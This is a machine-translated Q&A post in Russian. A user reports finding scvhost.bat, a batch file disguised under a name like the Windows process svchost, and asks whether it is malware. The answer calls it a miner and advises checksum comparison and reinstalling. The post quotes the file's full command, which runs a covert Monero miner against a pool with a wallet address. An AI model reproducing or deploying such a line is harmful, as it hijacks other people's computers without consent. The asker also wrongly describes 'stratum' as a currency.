Я только что нашел этот .bat файл с именем scvhost.bat. Файл содержал это содержание:
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
Это вирус (для кражи информации и т. Д.) Или засаженный майнер? Я волнуюсь, поскольку я также балуюсь криптовалютами, и stratum
это валюта, которая упоминается в приведенном выше файле.
windows
batch-file
malware
cryptomining
NewbieProgrammer
источник
источник
Ответы:
Похоже, это какой-то майнер, тем более что параметр содержит URL-адрес пула майнинга. Тем не менее, вы должны быть уверены, что в двоичном файле. Имеет смысл сравнить контрольные суммы найденного вами бинарного файла вашей системы с выпусками, сделанными командой разработчиков майнера. Если они отличаются; считаю вашу систему небезопасной.
Другая проблема заключается в том, что вы узнали об этом майнере (возможно, потому, что он использовал много процессора), но вы не представляете, что еще произошло в вашей системе. Если злоумышленник может запустить майнер, он мог бы запустить и другие вещи. Это может быть хорошей идеей для восстановления из резервной копии или в любом случае выполнить новую установку.
источник